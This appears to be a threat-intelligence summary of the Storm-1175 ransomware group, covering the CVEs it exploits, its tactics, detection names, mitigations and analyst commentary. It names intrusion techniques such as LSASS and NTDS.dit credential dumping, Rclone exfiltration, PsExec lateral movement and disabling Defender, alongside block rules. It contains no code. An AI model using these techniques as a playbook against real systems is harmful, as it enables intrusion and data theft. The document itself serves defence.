The financially motivated cybercriminal group Storm-1175, tracked by Microsoft Threat Intelligence, represents a new wave of high-speed ransomware operators. This threat actor specializes in exploiting N-day vulnerabilities—security flaws that are publicly disclosed but not yet widely patched—targeting web-facing systems during the critical exposure window.
Their operations are notable for rapid execution, often progressing from initial access to ransomware deployment within 24 hours to a few days, making them one of the fastest-moving ransomware actors observed in recent years.
Attack Strategy: Speed and Precision
Storm-1175’s success lies in its ability to quickly weaponize vulnerabilities after disclosure. Since 2023, the group has exploited over 16 vulnerabilities, including:
- CVE-2023-21529 (Microsoft Exchange)
- CVE-2023-27351, CVE-2023-27350 (Papercut)
- CVE-2023-46805, CVE-2024-21887 (Ivanti Connect Secure)
- CVE-2024-1709, CVE-2024-1708 (ConnectWise ScreenConnect)
- CVE-2024-27198, CVE-2024-27199 (JetBrains TeamCity)
- CVE-2025-31161 (CrushFTP)
- CVE-2025-10035 (GoAnywhere MFT)
- CVE-2025-52691, CVE-2026-23760 (SmarterMail)
- CVE-2026-1731 (BeyondTrust)
Notably, the actor has demonstrated zero-day capabilities, exploiting vulnerabilities like CVE-2026-23760 before public disclosure.
Attack and Exploitation Techniques
| Tactic | Observed activity | Tools and Techniques |
| Initial Access | Storm-1175 exploits vulnerable web-facing applications | – Ransomware-linked threat actor detected – Possible Beyond Trust software vulnerability exploitation – Possible exploitation of GoAnywhere MFT vulnerability – Possible SAP NetWeaver vulnerability exploitation Possible exploitation of JetBrains TeamCity vulnerability – Suspicious command execution via ScreenConnect – Suspicious service launched |
| Persistence and privilege escalation | Storm-1175 creates new user accounts under administrative groups using the net command | – User account created under suspicious circumstances – New local admin added using Net commands – New group added suspiciously – Suspicious account creation – Suspicious Windows account manipulation – Anomalous account lookups |
| Credential theft | Storm-1175 dumps credentials from LSASS, or uses a privileged position from the Domain Controller to access NTDS.dit and SAM hive | – Behavior:Win32/SAMDumpz – Exposed credentials at risk of compromise – Compromised account credentials – Process memory dump |
| Persistence, lateral movement | Storm-1175 uses RMM tools for persistence, payload delivery, and lateral movement | – Suspicious Atera activity – File dropped and launched from remote location |
| Execution | Storm-1175 delivers tools such as PsExec or leverages LOLbins like PowerShell to carry out post-compromise activity | – Behavior:Win32/PsexecRemote – Hands-on-keyboard attack involving multiple devices – Remote access software – Suspicious PowerShell command line – Suspicious PowerShell download or encoded command execution – Ransomware-linked threat actor detected |
| Exfiltration | Storm-1175 uses the synch tool Rclone to steal documents | – Potential human-operated malicious activity – Renaming of legitimate tools for possible data exfiltration – Possible data exfiltration – Hidden dual-use tool launch attempt |
| Defense evasion | Storm-1175 disables Windows Defender | – Defender detection bypass – Attempt to turn off Microsoft Defender Antivirus protection |
| Impact | Storm-1175 deploys Medusa ransomware | – Ransom:Win32/Medusa – Possible ransomware activity based on a known malicious extension – Possible compromised user account delivering ransomware-related files – Potentially compromised assets exhibiting ransomware-like behavior – Ransomware behavior detected in the file system – File dropped and launched from remote location |
Mitigation Strategies
Organizations can defend against Storm-1175 by implementing:
1. Attack Surface Reduction
- Use external attack surface management tools
- Isolate web-facing systems behind WAF or VPN
2. Credential Protection
- Enable Credential Guard
- Limit local administrator privileges
3. Endpoint Security
- Enable tamper protection
- Create rules for:
- Block LSASS credential theft
- Block web shell creation
- Block PsExec/WMI lateral movement
4. Monitoring and Response
- Enable automatic attack disruption
- Monitor for unauthorized RMM tools
Our Take:
Storm-1175 represents a critical evolution in ransomware operations, where speed has become the primary weapon. Unlike traditional attackers who rely on persistence over time, this group capitalizes on the gap between vulnerability disclosure and patching, exposing a systemic weakness in enterprise security practices.
Key Observations:
- Patch latency is the biggest risk: Organizations are still too slow in applying updates, giving attackers a predictable entry window.
- Living-off-the-land techniques are highly effective: The use of legitimate tools like PowerShell and RMM software makes detection significantly harder.
- Credential security remains weak: Repeated reliance on LSASS dumping and NTDS extraction shows many networks lack proper identity protection.
- Zero-day capability raises stakes: Even mature organizations may struggle if attackers gain early exploit access.
Security strategies must shift from reactive patching to proactive exposure management. Continuous attack surface monitoring, strict privilege controls, and automated response systems are no longer optional—they are essential.
